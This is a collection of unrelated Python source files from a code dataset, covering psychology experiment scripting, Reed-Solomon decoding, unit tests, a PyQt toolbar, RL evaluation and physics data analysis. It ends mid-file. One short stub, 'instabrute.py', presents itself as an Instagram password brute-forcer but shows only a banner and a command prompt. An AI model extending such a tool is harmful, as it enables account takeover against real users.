keep track of start time/frame for later\n RestCrossHair_2.tStart = t # underestimates by a little under one frame\n RestCrossHair_2.frameNStart = frameN # exact frame index\n RestCrossHair_2.setAutoDraw(True)\n if RestCrossHair_2.status == STARTED and t >= (9 + (4-win.monitorFramePeriod*0.75)): #most of one frame period left\n RestCrossHair_2.setAutoDraw(False)\n \n # *KeyboardResp_2* updates\n if t >= 7 and KeyboardResp_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n KeyboardResp_2.tStart = t # underestimates by a little under one frame\n KeyboardResp_2.frameNStart = frameN # exact frame index\n KeyboardResp_2.status = STARTED\n # keyboard checking is just starting\n KeyboardResp_2.clock.reset() # now t=0\n event.clearEvents(eventType='keyboard')\n if KeyboardResp_2.status == STARTED and t >= (7 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n KeyboardResp_2.status = STOPPED\n if KeyboardResp_2.status == STARTED:\n theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])\n \n # check for quit:\n if \"escape\" in theseKeys:\n endExpNow = True\n if len(theseKeys) > 0: # at least one key was pressed\n KeyboardResp_2.keys.extend(theseKeys) # storing all keys\n KeyboardResp_2.rt.append(KeyboardResp_2.clock.getTime())\n # was this 'correct'?\n if (KeyboardResp_2.keys == str(Correct)) or (KeyboardResp_2.keys == Correct):\n KeyboardResp_2.corr = 1\n else:\n KeyboardResp_2.corr = 0\n # *ISI* period\n if t >= 0.0 and ISI.status == NOT_STARTED:\n # keep track of start time/frame for later\n ISI.tStart = t # underestimates by a little under one frame\n ISI.frameNStart = frameN # exact frame index\n ISI.start(1)\n elif ISI.status == STARTED: #one frame should pass before updating params and completing\n ISI.complete() #finish the static period\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the Esc key)\n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#-------Ending Routine \"trial\"-------\nfor thisComponent in trialComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n# check responses\nif KeyboardResp_2.keys in ['', [], None]: # No response was made\n KeyboardResp_2.keys=None\n # was no response the correct answer?!\n if str(Correct).lower() == 'none': KeyboardResp_2.corr = 1 # correct non-response\n else: KeyboardResp_2.corr = 0 # failed to respond (incorrectly)\n# store data for thisExp (ExperimentHandler)\nthisExp.addData('KeyboardResp_2.keys',KeyboardResp_2.keys)\nthisExp.addData('KeyboardResp_2.corr', KeyboardResp_2.corr)\nif KeyboardResp_2.keys != None: # we had a response\n thisExp.addData('KeyboardResp_2.rt', KeyboardResp_2.rt)\nthisExp.nextEntry()\nwin.close()\ncore.quit()\n","sub_path":"PartialTrialDIR/Scripts/Testing/TestExamples_lastrun.py","file_name":"TestExamples_lastrun.py","file_ext":"py","file_size_in_byte":15072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614446326","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\nimport numpy as np\nfrom Source.GF64 import GFE\nfrom Source import GF_FUNC as GF_F\n\n\n# In[ ]:\n\n\ndef Syndrome_Check(t_RS, r_vector_RS, order_alpha, Z_RS):\n syndrome_RS=-1*np.ones(2*t_RS)\n for i in range(2*t_RS):\n for j in range(len(r_vector_RS)): \n dum1 = GF_F.GF_MUL(r_vector_RS[j], Z_RS[i]*j, order_alpha)\n syndrome_RS[i] = GF_F.GF_Add(dum1, syndrome_RS[i])[0]\n\n syndrome_check = 0\n for i in range(2*t_RS):\n if syndrome_RS[i] >= 0:\n syndrome_check+=1\n \n return syndrome_RS, syndrome_check\n\n\n# In[ ]:\n\ndef Receive_Bit(Eb_No, cx, k_RS, n_RS):\n req_Eb_No = 10**(Eb_No/10)\n Es_No = req_Eb_No * (k_RS/n_RS)\n Sigma=np.sqrt(1/(2*Es_No))\n \n rx = cx + np.random.normal(loc=0.0,scale=Sigma,size=cx.shape)\n \n return rx\n\ndef Trans_symbol(rx, m):\n r_RS = []\n rx_Hard = np.where(rx > 0.5, 1, 0)\n for i in range(0, len(rx), m):\n r_RS.append(GF_F.GF_Index(rx_Hard[i:i+m]))\n \n return r_RS\n\ndef SER_Calculation(Estimated_code, msg_RS, length_parity):\n Estimated_msg = Estimated_code[:,length_parity:]\n index = np.where((Estimated_msg - msg_RS) != 0)\n \n error_count = index[0].shape[0]\n \n SER = error_count/(msg_RS.shape[0]*msg_RS.shape[1])\n \n return SER\n \n\ndef Decoder(syndrome_RS, syndrome_check, r_vector_RS, t_RS, order_alpha, m):\n if syndrome_check == 0:\n return r_vector_RS\n else:\n A_coeff=[]\n for i in range(2*t_RS): \n A_coeff.append(-1) \n A_coeff.append(0)\n \n B_coeff=list(syndrome_RS)\n \n REMAINDER=[]\n REMAINDER.append(A_coeff)\n REMAINDER.append(B_coeff)\n \n T_coefficient=[]\n T_coefficient.append([-1]) ## alpha^-1 = 0 ##\n T_coefficient.append([0]) ## alpha^0 = 1 ##\n \n QUOTIENT=[]\n cnt_i=0\n while len(REMAINDER[-1])-1 >= t_RS:\n QUO, REM = GF_F.POL_DIV(REMAINDER[-2],REMAINDER[-1], order_alpha, m)\n QUOTIENT.append(QUO)\n REMAINDER.append(REM)\n Dummy_A=T_coefficient[-2]\n Dummy_B=GF_F.POL_MUL(QUOTIENT[-1],T_coefficient[-1], order_alpha)\n Dummy_C=GF_F.POL_Add(Dummy_A,Dummy_B)\n T_coefficient.append(Dummy_C)\n cnt_i+=1\n \n Kappa=(-1*T_coefficient[-1][0])%order_alpha \n Error_Location_coeff=[]\n for i in range(len(T_coefficient[-1])):\n Dummy=T_coefficient[-1][i]\n Error_Location_coeff.append(GF_F.GF_MUL(Kappa,Dummy, order_alpha))\n \n for i in range(len(T_coefficient[-1])):\n if T_coefficient[-1][-1] < 0:\n del T_coefficient[-1][-1]\n else: \n break\n \n Error_Evaluation_coeff=[]\n for i in range(len(REMAINDER[-1])):\n Dummy=REMAINDER[-1][i]\n Error_Evaluation_coeff.append(GF_F.GF_MUL(Kappa,Dummy, order_alpha))\n \n error_positions=[]\n Chien_Search_Values=[]\n num_errors=0\n for i in range(order_alpha):\n alpha_minus_i=(-1*i)%order_alpha ## alpha^(-i mod order_alpha), i=0,1,...,order_alpha ##\n Error_Location_Function_Value=GF_F.GF_Function_Value(alpha_minus_i,order_alpha,Error_Location_coeff)\n Chien_Search_Values.append(Error_Location_Function_Value)\n if Error_Location_Function_Value == -1: \n error_positions.append(i)\n num_errors+=1\n\n ## Error Evaluation after finding error locations ##\n # Derivative of Error Location Polynomial #\n Error_Location_Der=GF_F.GF_Derivative(Error_Location_coeff, order_alpha)\n \n # Numerator of Error Evaluation function #\n Error_Numerator=[]\n Error_Denominator=[]\n Error_Estimated_Values=[]\n Estimated_Error_Vector=-1*np.ones(len(r_vector_RS)) # Error Vector #\n for i in range(num_errors):\n Inv_Xi_Index=(-1*error_positions[i])%order_alpha\n Numerator_i=GF_F.GF_Function_Value(Inv_Xi_Index,order_alpha,Error_Evaluation_coeff)\n Error_Numerator.append(Numerator_i)\n Denominator_i=GF_F.GF_Function_Value(Inv_Xi_Index,order_alpha,Error_Location_Der)\n Error_Denominator.append(Denominator_i)\n Estim_Error_Value_i=GF_F.GF_MUL(Numerator_i,GF_F.GF_MUL_Inv(Denominator_i, order_alpha), order_alpha)\n Error_Estimated_Values.append(Estim_Error_Value_i)\n Estimated_Error_Vector[error_positions[i]]=Estim_Error_Value_i\n \n\n # Estimated Codeword #\n Estimated_Codeword=GF_F.POL_Add(r_vector_RS, Estimated_Error_Vector)\n \n return Estimated_Codeword\n\n","sub_path":"rs_code/Source/.ipynb_checkpoints/RS64_Decoder-checkpoint.py","file_name":"RS64_Decoder-checkpoint.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471694242","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom analysis.analysis_testcase import AnalysisTestCase\nfrom analysis.occurrence import Occurrence\nfrom analysis.occurrence import DefaultOccurrenceRanking\nfrom analysis.occurrence import RankByOccurrence\nfrom analysis.stacktrace import StackFrame\nfrom analysis.stacktrace import CallStack\nfrom analysis.suspect import Suspect\nfrom gae_libs.pipeline_wrapper import pipeline_handlers\n\n\nclass DummyClassifier(object):\n\n def GetClassFromStackFrame(self, frame):\n if frame.dep_path == 'src/':\n return 'class_1'\n\n if frame.dep_path == 'dummy/':\n return None\n\n return 'class_2'\n\n def GetClassFromSuspect(self, _result): # pragma: no cover.\n return 'class_3'\n\n def Classify(self, results, crash_stack):\n top_n_frames = 4\n if results:\n classes = map(self.GetClassFromSuspect, results[:top_n_frames])\n else:\n classes = map(self.GetClassFromStackFrame,\n crash_stack.frames[:top_n_frames])\n\n class_list = RankByOccurrence(classes, 1)\n if class_list:\n return class_list[0]\n\n return ''\n\n\nclass ClassifierTest(AnalysisTestCase):\n\n def testDefaultOccurrenceRanking(self):\n self.assertEqual(DefaultOccurrenceRanking(Occurrence('c1', [0])),\n (-1, 0))\n self.assertEqual(DefaultOccurrenceRanking(Occurrence('c1', [0, 1])),\n (-float('inf'), 0))\n\n def testClassifyCrashStack(self):\n dummy_classifier = DummyClassifier()\n\n crash_stack = CallStack(0)\n self.assertEqual(dummy_classifier.Classify([], crash_stack), '')\n\n crash_stack = CallStack(0, frame_list=[\n StackFrame(0, 'src/', 'a::c(p* &d)', 'f0.cc', 'src/f0.cc', [177]),\n StackFrame(1, 'src/', 'a::d(a* c)', 'f1.cc', 'src/f1.cc', [227]),\n StackFrame(2, 'src/dummy', 'a::e(int)', 'f2.cc', 'src/f2.cc', [87]),\n StackFrame(3, 'dummy/', 'a::g(int)', 'f3.cc', 'src/f3.cc', [87])])\n\n self.assertEqual(dummy_classifier.Classify([], crash_stack), 'class_1')\n\n crash_stack = CallStack(0, frame_list=[\n StackFrame(0, 'src/', 'a::c(p* &d)', 'f0.cc', 'src/f0.cc', [177]),\n StackFrame(1, 'src/dummy', 'a::d(a* c)', 'f1.cc', 'src/f1.cc', [227]),\n StackFrame(2, 'src/dummy', 'a::e(int)', 'f2.cc', 'src/f2.cc', [87])])\n\n self.assertEqual(dummy_classifier.Classify([], crash_stack), 'class_2')\n\n def testClassifySuspects(self):\n dummy_classifier = DummyClassifier()\n\n suspect = Suspect(self.GetDummyChangeLog(), 'src/')\n suspect.file_to_stack_infos = {\n 'f0.cc': [(StackFrame(\n 0, 'src/', 'a::c(p* &d)', 'f0.cc', 'src/f0.cc', [177]), 0)]\n }\n\n self.assertEqual(dummy_classifier.Classify([suspect], CallStack(0)),\n 'class_3')\n\n","sub_path":"appengine/predator/analysis/test/occurrence_test.py","file_name":"occurrence_test.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"601577937","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 12 14:17:09 2016\r\n\r\n@author: M1029148\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn import linear_model\r\nimport os\r\nos.chdir('D:\\\\allstate')\r\ndf_train=pd.read_csv(\"train.csv\")\r\ndf_test=pd.read_csv(\"test.csv\")\r\nusecols=[]\r\nfor c in df_train.columns:\r\n if 'cont' in c:\r\n usecols.append(c)\r\n\r\nx_train = df_train[usecols]\r\nx_test =df_test[usecols]\r\ny_train=df_train['loss']\r\nid_test=df_test['id']\r\n\r\nfor c in df_train.columns:\r\n if 'cat' in c:\r\n df_train[c]=df_train[c].astype('category')\r\n df_test[c]=df_test[c]. astype('category')\r\n x_train[c + '_numeric'] = df_train[c].cat.codes\r\n x_test[c + '_numeric'] = df_test[c].cat.codes\r\n\r\nregr = linear_model.LinearRegression()\r\nregr.fit(x_train,y_train)\r\ny_pred = regr.predict(x_test)\r\nsub= pd.DataFrame()\r\nsub['id']=id_test\r\nsub['loss']=y_pred\r\nsub.to_csv('lin_regression.csv', index=False)","sub_path":"Prgm4.py","file_name":"Prgm4.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"498499023","text":"from random import shuffle\nfrom card import Card\n\nclass Deck:\n '''\n The Deck class represents a standard deck of cards in the form of a\n list. Card class explained in card.py.\n '''\n \n def __init__(self):\n '''Creates a list of 52 cards.'''\n self.cards = []\n types = ['K', 'Q', 'J', '10', '9', '8', '7', '6', '5', '4', '3', '2', 'A']\n # Create 4 cards of each type and append it to the cards list.\n for type in types:\n for i in range(4):\n new_card = Card(type)\n self.cards.append(new_card)\n\n def shuffle_deck(self):\n '''Uses random.shuffle to randomize the list.'''\n shuffle(self.cards)\n","sub_path":"deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645151207","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Author: luyizhou4\n# @Date: 2020-02-11 14:46:36\n# @Function: \n# @Last Modified time: 2020-02-11 15:21:46\n\nimport sys\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport kaldi_io\n\ndef main():\n filename = sys.argv[1]\n out_path = sys.argv[2]\n lang_emb_start = int (sys.argv[3])\n lang_emb_end = int (sys.argv[4])\n emb = kaldi_io.read_mat(filename)\n emb = np.transpose(emb, (1,0))[lang_emb_start:lang_emb_end, :]\n print(emb.shape)\n plt.matshow(emb, fignum=None)\n plt.savefig(out_path + '.png')\n\nif __name__ == '__main__':\n main()","sub_path":"espnet/nets/pytorch_backend/mlpmoe/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210194893","text":"import os\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QToolBar, QAction, QApplication, QFileDialog\n\nfrom src.data.applicationname import ApplicationName\nfrom src.data.screencapture import ScreenCapture\nfrom src.newapplicationwindow import NewApplicationWindow\n\n\ndef get_icon(file_name: str) -> str:\n current_directory_path = os.path.dirname(__file__)\n return os.path.abspath(os.path.join(current_directory_path, '..', 'resources', file_name))\n\n\nclass Toolbar(QToolBar):\n def __init__(self, on_start_run, on_stop_run,\n on_region_add, on_config_save, on_config_load):\n super(Toolbar, self).__init__()\n self.new_application_window = None\n self.on_start_run = on_start_run\n self.on_stop_run = on_stop_run\n self.capture_area = ScreenCapture()\n self.capture_area.bind(self.on_update_capture_area)\n self.on_region_add_callback = on_region_add\n self.on_config_save = on_config_save\n self.on_config_load = on_config_load\n\n self.start = None\n self.stop = None\n self.add_region_action = None\n\n self.application_name = ApplicationName()\n self.application_name.bind(self.on_application_name_change)\n self.running = False\n\n self.init_toolbar()\n\n def init_toolbar(self):\n new_application = QAction(QIcon(get_icon('NewIcon.png')), 'New Application', self)\n new_application.triggered.connect(self.on_new_application)\n new_application.setStatusTip('Application to search for')\n\n save_config = QAction(QIcon(get_icon('SaveIcon.png')), 'Save configuration', self)\n save_config.triggered.connect(self.on_save_press)\n save_config.setStatusTip('Save configuration')\n\n load_config = QAction(QIcon(get_icon('LoadIcon.png')), 'Load configuration', self)\n load_config.triggered.connect(self.on_load_press)\n load_config.setStatusTip('Load configuration')\n\n self.start = QAction(QIcon(get_icon('StartIcon.png')), 'Start', self)\n self.start.triggered.connect(self.on_start)\n self.start.setDisabled(self.is_start_disabled())\n self.start.setStatusTip('Start')\n\n self.stop = QAction(QIcon(get_icon('PauseIcon.png')), 'Stop', self)\n self.stop.triggered.connect(self.on_stop)\n self.stop.setDisabled(self.is_stop_disabled())\n self.stop.setStatusTip('Stop')\n\n self.add_region_action = QAction(QIcon(get_icon('RegionIcon.png')), 'New Region', self)\n self.add_region_action.triggered.connect(self.on_region_add)\n self.add_region_action.setDisabled(True)\n self.add_region_action.setStatusTip('Create a new region')\n\n self.addAction(new_application)\n self.addAction(save_config)\n self.addAction(load_config)\n self.addAction(self.start)\n self.addAction(self.stop)\n self.addAction(self.add_region_action)\n\n def is_start_disabled(self):\n application_name = self.application_name.get()\n return (application_name is None or application_name is \"\") or self.running\n\n def is_stop_disabled(self):\n return not self.running\n\n def on_application_name_change(self, _):\n self.set_buttons_disabled_state()\n\n def on_app_dialog_confirm(self, text):\n self.application_name.set(text)\n\n def on_load_press(self):\n selected = QFileDialog.getOpenFileName(self, 'Load Configuration', '', \"AutoMate files (*.automate)\")\n if selected[0] is not \"\":\n self.on_config_load(selected[0])\n self.set_buttons_disabled_state()\n\n def on_new_application(self):\n self.new_application_window = NewApplicationWindow(self.application_name.get())\n self.new_application_window.on_confirm(self.on_app_dialog_confirm)\n\n def on_region_add(self):\n QApplication.setOverrideCursor(Qt.CrossCursor)\n self.on_region_add_callback()\n\n def on_save_press(self):\n selected = QFileDialog.getSaveFileName(self, 'Save Configuration', '', \"AutoMate files (*.automate)\")\n if selected[0] is not \"\":\n self.on_config_save(selected[0])\n\n def on_start(self):\n self.running = True\n self.set_buttons_disabled_state()\n self.on_start_run()\n self.update()\n\n def on_stop(self):\n self.running = False\n self.set_buttons_disabled_state()\n self.on_stop_run()\n self.update()\n\n def on_update_capture_area(self, _):\n self.add_region_action.setDisabled(False)\n\n def set_buttons_disabled_state(self):\n self.stop.setDisabled(self.is_stop_disabled())\n self.start.setDisabled(self.is_start_disabled())\n","sub_path":"src/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"371050713","text":"import numpy\nimport os\n\ntemp = []\npath = 'data/txtshort/'\nlisting = os.listdir(path)\nfor infile in listing:\n\tarrays = numpy.genfromtxt(path+infile)\n\ttemp.append(arrays)\n\narr = numpy.zeros((15,15,2178))\n\n\nfor x in range(len(temp)):\n\tarr[x] = temp[x]\n\n\nx_train = arr[:7]\ny_train = arr[:7]\n\nx_val = arr[7:9]\ny_val = arr[7:9]\nx_test = arr[-1] \ny_test = arr[-1]\n\n\n\n\n","sub_path":"dump/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"261739133","text":"frase = input('Entre com uma frase: ')\nfrasenospace = frase.replace(' ', '') \nprint(frasenospace)\nquantiletra = (len(frasenospace)) \nprint(quantiletra)\n\nletraespec = input('qual letra vc deseja conferir:')\nletraespecvss = frasenospace.count(letraespec)\n\nporcenletra = (letraespecvss/quantiletra)*100 \nprint('A letra: {}, aparece {} vezes na frase: {}'.format(letraespec, letraespecvss, frase))\nprint('A porcentagem de repetição desse caracterer em relação ao tamanho da frase é {:.2f}%'.format(porcenletra))","sub_path":"porcentagem.py","file_name":"porcentagem.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468666163","text":"### INSTABRUTE BY THEAUTISTIC9 ###\n### NOT MAKED FOR ILLEGAL PURPOSES ###\n### DEDICATED TO LUXI, ANON, MANGEL AND ANA ###\n### HAVE FUN ###\n\nfrom lib.banner import banner\nfrom lib.colors import colors\n\ndef main():\n\tcommand = input(colors.UNDERLINE+'instaBrute'+colors.ENDC+'> ')\n\tbanner.console(command)\n\treturn\n\n\n#init\nbanner.intro()\nwhile True:\n\tmain()\n","sub_path":"instabrute.py","file_name":"instabrute.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"628708956","text":"from django.conf.urls import include, url, patterns\nimport views\n\nurlpatterns = patterns ('',\n\turl(r'^$', views.index, name='index'),\n\turl(r'^logout$', views.logout, name='logout'),\n\turl(r'^home$', views.home, name='home'),\n\turl(r'^profile$', views.profile, name='profile'),\n\turl(r'^profile/edit$', views.edit_profile, name='edit_profile'),\n\turl(r'^profile/update$', views.update_profile, name='update_profile'),\n\n)\n","sub_path":"apps/login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301187612","text":"#!/usr/bin/env python\n# coding=utf-8\n\n# Author : Xionghui Chen\n# Created : 2017-11-12\n# Modified : 2017-11-12\n# Version : 1.0\nimport matplotlib.pyplot as plt\nimport pickle\nimport time\nfrom gym import wrappers\nimport os\nimport sys\nMAX_ITER = 2000\n\n\nclass Tester(object):\n\n def __init__(self, episodes, period, env, time_step_holder, file, session, save_object=True):\n \"\"\"\n Tester is a class can store all of record and parameter in your experiment.\n It will be saved as a pickle. you can load it and plot those records to curve picture.\n\n Parameters\n ----------\n episodes : int\n repeat time per evalate test.\n\n period : int\n test period\n\n env : construct from gym.make\n test environment\n\n time_step_holder: common.variable.TimeStepHolder\n glabal time step holder\n\n file: string\n file to store pickle\n \"\"\"\n self.period = period\n self.time_step_holder = time_step_holder\n self.episodes = episodes\n self.__custom_recorder = {}\n self.super_param = {}\n self.session = session\n self.strftims = str(time.strftime(\n \"%Y-%m-%d %H:%M:%S\", time.localtime()))\n self.file = file+'/' + self.strftims + '.pkl'\n self.env = env\n self.save_object = save_object\n self.__custom_data = {}\n # sys.stdout = open('./log/'+self.strftims+'.log', 'w')\n # wrappers.Monitor(\n # env, VIDEO_PREFIX_PATH + self.strftims, video_callable=lambda: True)\n\n def reset_tester(self):\n self.__custom_recorder = {}\n self.__custom_data = {}\n self.strftims = str(time.strftime(\n \"%Y-%m-%d %H:%M:%S\", time.localtime()))\n self.file = file+'/' + self.strftims + '.pkl'\n\n def check_and_test(self, agent, use_temp=False, always=False):\n if self.time_step_holder.get_time() % self.period == 0 or always:\n e = 0\n avg_return = 0\n current_return_list = []\n state_num_list = []\n while e < self.episodes:\n itera_num = 0\n ob = self.env.reset()\n current_return = 0\n terminal = False\n state_number = 0\n while not terminal:\n if use_temp:\n action = agent.act_temp(ob)\n else:\n action, _ = agent.act(True, ob)\n ob, reward, terminal, _ = self.env.step(action)\n current_return += reward\n itera_num += 1\n state_number += 1\n if itera_num > MAX_ITER:\n itera_num = 0\n break\n state_num_list.append(state_number)\n if e % int(self.episodes/10) == 0:\n print(\"end episodes %s\" % e)\n current_return_list.append(current_return)\n e += 1\n\n avg_return = sum(current_return_list) * 1.0 / \\\n len(current_return_list)\n avg_state = sum(state_num_list) * 1.0 / len(state_num_list)\n print(\"file :%s[test] use temp is %s end test time %s, return %s, avg_state %s\" %\n (self.file, use_temp, self.time_step_holder.get_time(), avg_return, avg_state))\n self.add_custom_record(\"return\", self.time_step_holder.get_time(\n ), avg_return, x_name='time_step', y_name='return avg %s episodes' % self.episodes)\n\n return avg_return\n\n def end_check(self, satisfied_length, end_point):\n \"\"\"\n Check if average return value of recent satisfied_length number larger than end_point\n\n Parameters\n ----------\n satisfied_length : int\n\n end_point : int\n\n \"\"\"\n if end_point == None:\n return False\n else:\n if 'return' not in self.__custom_recorder:\n return False\n length = len(self.__custom_recorder['return'][\n self.__custom_recorder['return']['name'][1]])\n to_cal_return = self.__custom_recorder['return'][\n self.__custom_recorder['return']['name'][1]][length-satisfied_length:]\n avg_ret = sum(to_cal_return) / (len(to_cal_return) + 1)\n print(\n \"-----------------------------------recent return is %s -------------------------\" % avg_ret)\n if avg_ret >= end_point:\n return True\n else:\n return False\n\n def set_super_param(self, **argkw):\n \"\"\"\n This method is to record all of super parameters to test object.\n\n Place pass your parameters as follow format:\n self.set_super_param(param_a=a,param_b=b)\n\n Note: It is invalid to pass a local object to this function.\n\n Parameters\n ----------\n argkw : key-value \n for example: self.set_super_param(param_a=a,param_b=b)\n\n \"\"\"\n self.super_param = argkw\n\n def add_custom_record(self, key, x, y, x_name, y_name):\n \"\"\"\n This model is to add record to specific 'key'.\n After that, you can load plk file and call 'print' function to print x-y curve. \n\n Parameters\n ----------\n key : string\n identify your curve\n\n x: float or int\n x value to be added.\n\n y: float or int\n y value to be added.\n\n x_name: string\n name of x axis, will be displayed when call print function\n\n y_name: string\n name of y axis, will be displayed when call print function\n \"\"\"\n if key not in self.__custom_recorder:\n self.__custom_recorder[key] = {}\n self.__custom_recorder[key][x_name] = [x]\n self.__custom_recorder[key][y_name] = [y]\n self.__custom_recorder[key]['name'] = [x_name, y_name]\n else:\n self.__custom_recorder[key][x_name].append(x)\n self.__custom_recorder[key][y_name].append(y)\n self.serialize_object_and_save()\n\n def add_custom_data(self, key, data, dtype):\n if key not in self.__custom_data:\n if isinstance(dtype, list):\n self.__custom_data[key] = [data]\n else:\n self.__custom_data[key] = data\n else:\n if isinstance(dtype, list):\n self.__custom_data[key].append(data)\n else:\n self.__custom_data = data\n\n def __print_unit(self, key, style):\n if key in self.__custom_recorder:\n x_name, y_name = self.__custom_recorder[key]['name']\n plt.plot(self.__custom_recorder[key][\n x_name], self.__custom_recorder[key][y_name], style)\n plt.xlabel(x_name)\n plt.ylabel(y_name)\n else:\n print('[Tester plot wrong] key %s not exist. ' % key)\n\n def print(self, key, style):\n \"\"\"\n plot single curve store in key.\n\n Parameters\n ----------\n key : string\n the id which has been set when call self.add_custom_record function\n\n style : string\n define the style of curve to be plot, for example : 'r-', 'go'\n\n \"\"\"\n self.__print_unit(key, style)\n\n def multi_print(self, key_list, style_list):\n \"\"\"\n plot several curve store in key_list.\n\n Parameters\n ----------\n key_list : array of string\n the id list which has been set when call self.add_custom_record function\n\n type_list: array of string\n\n\n \"\"\"\n for key, style in zip(key_list, style_list):\n self.__print_unit(key, style)\n\n def serialize_object_and_save(self):\n \"\"\"\n This method is to save test object to a pickle.\n This method will be call every time you call add_custom_record or other record function like self.check_and_test\n \"\"\"\n # remove object which can is not serializable\n if self.save_object:\n sess = self.session\n self.session = None\n with open(self.file, 'wb') as f:\n pickle.dump(self, f)\n self.session = sess\n\n def set_figure(self, fig):\n self.fig = fig\n\n def show(self):\n self.fig.show()\n\n def savefig(self, *argv, **argkw):\n self.fig.savefig(*argv, **argkw)\n\n def print_args(self):\n for key, value in self.super_param.items():\n print(\"key: %s, value: %s\" % (key, value))\n\n def save_suctom_object(self, class_name, ob):\n with open(self.file + '-'+class_name, 'wb') as f:\n pickle.dump(ob, f)\n","sub_path":"baselines/trpo_mpi/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"238413700","text":"import lmfit\nfrom uncertainties import ufloat\nfrom pycqed.analysis import measurement_analysis as ma\nfrom collections import OrderedDict\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport pycqed.analysis_v2.base_analysis as ba\nimport numpy as np\nfrom pycqed.analysis.tools.data_manipulation import \\\n populations_using_rate_equations\nfrom pycqed.analysis.tools.plotting import set_xlabel, set_ylabel, plot_fit, \\\n make_anglemap, make_segmented_cmap\nimport matplotlib.pyplot as plt\nfrom pycqed.analysis.fitting_models import CosFunc, Cos_guess, \\\n avoided_crossing_freq_shift\nfrom pycqed.analysis_v2.simple_analysis import Basic2DInterpolatedAnalysis\n\nfrom pycqed.analysis.analysis_toolbox import color_plot\n\nfrom matplotlib import colors\nfrom copy import deepcopy\nfrom pycqed.analysis.tools.plot_interpolation import interpolate_heatmap\n\nimport logging\n\nlog = logging.getLogger(__name__)\n\nclass Chevron_Analysis(ba.BaseDataAnalysis):\n def __init__(self, ts: str=None, label=None,\n ch_idx=0,\n coupling='g', min_fit_amp=0, auto=True):\n \"\"\"\n Analyzes a Chevron and fits the avoided crossing.\n\n Parameters\n ----------\n ts: str\n timestamp of the datafile\n label: str\n label to find the datafile (optional)\n ch_idx: int\n channel to use when fitting the avoided crossing\n coupling: Enum(\"g\", \"J1\", \"J2\")\n used to label the avoided crossing and calculate related quantities\n min_fit_amp:\n minimal maplitude of the fitted cosine for each line cut.\n Oscillations with a smaller amplitude will be ignored in the fit\n of the avoided crossing.\n auto: bool\n if True run all parts of the analysis.\n\n \"\"\"\n super().__init__(do_fitting=True)\n self.ts = ts\n self.label = label\n self.coupling = coupling\n self.ch_idx = ch_idx\n self.min_fit_amp = min_fit_amp\n if auto:\n self.run_analysis()\n\n def extract_data(self):\n self.raw_data_dict = OrderedDict()\n a = ma.MeasurementAnalysis(\n timestamp=self.ts, label=self.label, auto=False)\n a.get_naming_and_values_2D()\n a.finish()\n self.timestamps = [a.timestamp_string]\n self.raw_data_dict['timestamps'] = self.timestamps\n self.raw_data_dict['timestamp_string'] = a.timestamp\n for attr in ['sweep_points', 'sweep_points_2D', 'measured_values',\n 'parameter_names', 'parameter_units', 'value_names',\n 'value_units']:\n self.raw_data_dict[attr] = getattr(a, attr)\n self.raw_data_dict['folder'] = a.folder\n\n def process_data(self):\n self.proc_data_dict = OrderedDict()\n\n # select the relevant data\n x = self.raw_data_dict['sweep_points']\n t = self.raw_data_dict['sweep_points_2D']\n Z = self.raw_data_dict['measured_values'][self.ch_idx].T\n\n # fit frequencies to each individual cut (time trace)\n freqs = []\n freqs_std = []\n fit_results = []\n amps = []\n for xi, z in zip(x, Z.T):\n CosModel = lmfit.Model(CosFunc)\n CosModel.guess = 